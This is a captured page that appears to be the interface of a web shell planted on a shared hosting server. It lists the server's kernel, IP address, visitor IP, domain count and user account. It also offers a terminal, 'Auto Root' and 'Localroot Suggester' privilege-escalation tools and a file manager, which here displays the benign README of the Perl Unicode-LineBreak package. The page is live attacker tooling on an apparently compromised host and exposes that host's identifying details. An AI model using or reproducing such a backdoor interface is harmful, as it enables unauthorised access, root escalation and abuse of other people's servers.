Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
perl-Unicode-LineBreak /
Delete
Unzip
Name
Size
Permission
Date
Action
Changes
15.15
KB
-rw-r--r--
2018-12-29 05:16
Changes.REL1
7.15
KB
-rw-r--r--
2017-04-11 09:53
README
1.86
KB
-rw-r--r--
2018-03-29 12:36
Todo.REL1
1.74
KB
-rw-r--r--
2017-04-11 09:53
Save
Rename
=========================================================== Unicode-LineBreak - UAX #14 Unicode Line Breaking Algorithm =========================================================== Unicode-LineBreak Package is Copyright (C) 2009-2018, by Hatuka*nezumi - IKEDA Soji. This package is free software; you can redistribute it and/or modify it under the same terms as Perl itself. Prerequisites ============= Perl 5.8.0 or later is required. Sombok library package is required. If Sombok had not been installed, bundled source will be used. https://sourceforge.net/projects/linefold/files/ Optionally, LibThai package is needed to support Thai word segmentation: http://linux.thai.net/projects/libthai/ Additionally, pkg-config will be required for libthai and/or shared sombok library. Install ======= To build and install Unicode-LineBreak package, do: $ perl Makefile.PL $ make $ make test # make install If you wish to disable libthai feature explicitly, do: $ perl Makefile.PL --with-bundled-sombok --disable-libthai $ make $ make test # make install Documentations ============== Three main modules and some supporting program files are contained. For more details read following POD documentations: Text::LineFold - Line Folding for Plain Text Unicode::GCString - String as Sequence of UAX #29 Grapheme Clusters Unicode::LineBreak - UAX #14 Unicode Line Breaking Algorithm For japonophones, PODs in Japanese language are also included: POD2::JA::Text::LineFold - プレインテキストの行折り POD2::JA::Unicode::GCString - UAX #29 書記素クラスタの列としての文字列 POD2::JA::Unicode::LineBreak - UAX #14 Unicode 行分割アルゴリズム For Other Language ================== Python pytextseg: http://pypi.python.org/pypi/pytextseg/ Author ====== Hatuka*nezumi - IKEDA Soji <hatuka(at)nezumi.nu>. $$